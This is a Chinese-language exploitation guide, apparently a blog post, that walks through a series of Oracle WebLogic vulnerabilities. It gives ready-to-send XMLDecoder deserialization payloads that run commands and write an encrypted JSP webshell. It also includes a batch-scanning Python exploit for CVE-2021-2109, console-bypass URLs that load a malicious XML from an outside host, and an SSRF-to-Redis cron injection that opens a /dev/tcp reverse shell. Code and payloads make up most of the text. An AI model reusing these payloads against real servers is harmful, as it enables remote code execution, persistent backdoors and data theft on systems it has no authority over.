一、通过Javabean XML方式发送反序列化数据
1.1 CVE-2017-3506(XMLDecoder反序列化漏洞)
- 影响版本:WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 版本
- 漏洞位置:
127.0.0.1:7001/wls-wsat/CoordinatorPortType
(POST) - 影响组件:
WSL Security
- 漏洞原理:使用XMLDecoder来解析用户传入的XML数据,在解析过程中出现反序列化漏洞。
- 其他可利用URL:
只要是wls-wsat包中的uri都会受影响,默认收到的如下:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
- 漏洞利用:
抓包修改请求方式为POST,修改Content-Type为text/xml
post内容:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd.exe</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>calc</string></void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
这个xml文件被反序列化将会调用ProcessBuilder
类的start
方法
(结果会返回500,但实际命令是执行成功的)
- 漏洞利用(写webshell):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>
<void method="println"><string>
<![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="xxxxxxxxxxxxxxxx";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
这个xml文件被反序列化将会调用PrintWriter
类的println
方法去写马
然后用冰蝎连接http://192.168.111.131:7001/bea_wls_internal/shell.jsp
测试
1.2 CVE-2017-10271(XMLDecoder反序列化漏洞)
- 漏洞介绍:该漏洞实际上是CVE-2017-3506的绕过,CVE-2017-3506的补丁添加了验证函数,验证Payload中的节点是否存在object标签。将object换成void就可以绕过此补丁,产生了CVE-2017-10271
- payload:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd.exe</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>calc</string></void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
当然还出现了很多很多变形的payload,不使用void
而使用new
和method
等标签:
<java version="1.4.0" class="java.beans.XMLDecoder">
<new class="java.lang.ProcessBuilder">
<string>calc.exe</string>
<method name="start" />
</new>
</java>
1.3 CVE-2019-2725(XMLDecoder反序列化漏洞)
- 漏洞介绍:该漏洞核心利用点依旧是weblogic的xmldecoder反序列化漏洞,该漏洞实际上还是CVE-2017-10271补丁的另一个入口和绕过,上一个补丁过滤了名字为object、new、method的元素节点,其次限制了void元素只能使用index属性或者空属性。
- 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
- 漏洞位置:
127.0.0.1:7001/_async/AsyncResponseService
(POST) - 影响组件:
bea_wls9_async_response.war、wls-wsat.war
- 漏洞原理:
1.由于没了method
元素,也没了带method
属性的void
元素,我们就不能指定任意的对象方法。但是class 元素节点同样可以指定任意的反序列化类名。所以我们又可以指定任意类了
2.在传递参数时我们只能使用空属性或者只带index属性的void元素节点,其次在传入使用数组参数时,array元素的class属性只能为空或者byte。所以我们可以使用oracle.toplink.internal.sessions.UnitOfWorkChangeSet
来实现 - 漏洞利用:
利用ysoserial生成序列化对象转化成字节数组类型后拼接到xml中:
<?xml version="1.0" encoding="utf-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="5010">
<void index="0"><byte>-84</byte></void>
<void index="1"><byte>-19</byte></void>
...
...
...
<void index="5007"><byte>120</byte></void>
<void index="5008"><byte>112</byte></void>
<void index="5009"><byte>120</byte></void></array>
</void></class>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body></soapenv:Body></soapenv:Envelope>
而由于10.2.6.0的自带jdk版本为1.6+,所以可以用jdk7u21 gadget达到RCE。
但是在v12中并没有oracle.toplink.internal.sessions.UnitOfWorkChangeSet
这个类,但是可以用org.slf4j.ext.EventData
进行二次反序列化
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<class><string>org.slf4j.ext.EventData</string>
<void>
<string>
<java>
<void class="sun.misc.BASE64Decoder">
<void method="decodeBuffer" id="byte_arr"> <string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string>
</void>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>ResultBaseExec</string>
<object idref="byte_arr"></object>
<void method="newInstance">
<void method="do_exec" id="result">
<string>cat /etc/passwd</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork" id="current_work">
<void method="getClass">
<void method="getDeclaredField">
<string>connectionHandler</string>
<void method="setAccessible"><boolean>true</boolean></void>
<void method="get">
<object idref="current_work"></object>
<void method="getServletRequest">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</void>
</void>
</void>
</void>
</java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
返回结果为202
或者直接使用msf获取shell:exploit(multi/misc/weblogic_deserialize_asyncresponseservice)
1.4 CVE-2019-2729(XMLDecoder反序列化漏洞)
- 漏洞介绍:与CVE-2019-2725漏洞相似,是CVE-2019-2725的又一个绕过
- 漏洞原理:
<class>
标签的功能会被标签<array method=”forName”>
所替代。因此,使用标签<array method=”forName”>
替换<class>
标签就可以绕过黑名单。 - 漏洞利用
poc:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/
xmlns:wsa="http://www.w3.org/2005/08/addressing
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><array method="forName">'
<string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
<void><array class="byte" length="6006">
<void index="0"><byte>-84</byte></void>
<void index="1"><byte>-19</byte></void>
...
...
...
<void index="6002"><byte>0</byte></void>
<void index="6003"><byte>126</byte></void>
<void index="6004"><byte>0</byte></void>
<void index="6005"><byte>45</byte></void>
</array></void></array></java>
</work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
在此漏洞公布后,官方也做了修复,这次使用的白名单方法来修复,这是通过新引入的validateFormat()
函数和WorkContextFormatInfo
中定义的白名单规则来实现的。白名单中仍然是允许<array>
标签的,但只允许含有byte值的class属性或含有任意值的length属性。
2.LDAP 远程代码执行漏洞(CVE-2021-2109)
- 影响版本:WebLogic Server 10.3.6.0.0,12.1.3.0.0,12.2.1.3.0,12.2.1.4.0,14.1.1.0.0
- 漏洞位置:
127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
- 漏洞利用:
- 和上一个漏洞一样,首先使用未授权漏洞进入console:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal
- 下载漏洞攻击需要的 LDAP启动脚本并启动:下载链接
- 通过未授权访问即可执行命令:
http://localhost:7001/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xx;xx:1389/Basic/WeblogicEcho;AdminServer%22)
注意:这里 LDAP服务器地址第三个分隔符号为 ;
并且在请求头里添加cmd
,值为需要执行的命令,例如:
- 批量检测poc:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def CVE_2021_2109(target_url, ip):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
target_url = target_url.strip()
if not target_url.startswith('http'):
vuln_url = 'http://' + target_url + f"/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://{'.'.join(ip.split('.')[:3])};{ip.split('.')[-1]}:1389/Basic/WeblogicEcho;AdminServer%22)"
else:
vuln_url = target_url + f"/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://{'.'.join(ip.split('.')[:3])};{ip.split('.')[-1]}:1389/Basic/WeblogicEcho;AdminServer%22)"
headers = {'cmd': 'cat /etc/passwd'}
try:
r = requests.get(vuln_url, headers=headers, verify=False, timeout=5)
if 'root' in r.text:
print(f'\033[36m[+] {target_url} 存在CVE-2021-2109漏洞 \033[0m')
else:
print(f'\033[31m[x] {target_url} 利用失败 \033[0m')
except Exception:
print(f"\033[31m[x] {target_url} 请求超时 \033[0m")
if __name__ == '__main__':
ip = str(input("\033[35m请输入运行JNDIExploit服务器ip >>> \033[0m"))
with open('urls.txt')as f:
ips = f.readlines()
for i in ips:
CVE_2021_2109(i, ip)
3.未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
- 影响版本:Oracle Weblogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
- 漏洞位置:
127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
- 漏洞利用:
- 首先是未授权访问:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal
- 在Weblogic 12.2.1以上版本中,我们可以使用
com.tangosol.coherence.mvel2.sh.ShellSession
类:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20/tmp/test%27);%22)
- 漏洞利用2:
通杀的方法:com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
类
- 首先构造一个恶意xml文件,并能让weblogic可访问到改xml文件
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[touch /tmp/success2]]></value>
</list>
</constructor-arg>
</bean>
</beans>
- 然后通过以下url,让weblogic加载恶意xml,并执行其中的命令:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("https://yuaneu.ro/exp/rce.xml")
4.任意文件上传(CVE-2019-2618)
- 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
- 漏洞位置:
127.0.0.1:7001/bea_wls_deployment_internal/DeploymentService
(POST) - 利用条件:需知道用户名和密码
- 漏洞利用:
- 首先登录后台,勾选
启用 Web 服务测试页
并保存 - 访问
http://localhost:7001/ws_utc/config.do
,设置Work Home Dir
为:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
(访问这个目录是无需权限的,这一点很重要。) - 然后点击安全 -> 增加,然后上传webshell:
并且记录上传的时间戳。 - 然后访问
http://localhost:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]
,即可执行webshell:
5.SSRF漏洞(CVE-2014-4210)
- 影响版本:weblogic 10.0.2 -- 10.3.6.0
- 漏洞位置:
127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp
- 漏洞利用:
在此处随便输入东西后点search后抓包,
红框处位置存在ssrf漏洞,
例如修改为127.0.0.1:7001的回显:
修改为不存在的端口例如8888的回显:
- 漏洞利用2:
结合 %0a%0d来注入换行符 和redis反弹shell
xxx
set asd "\n\n* * * * * sh -i >& /dev/tcp/192.168.111.128/4444 0>&1\n\n "
config set dir /var/spool/cron
config set dbfilename root
save
xxx
将上列命令进行url编码
poc:
http://192.168.111.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/xxx%0D%0Aset%20asd%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F4444%200%3E%261%5Cn%5Cn%20%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0Axxx
去redis服务器看一眼
没问题,计划任务写进去了
过一会shell也反弹回来了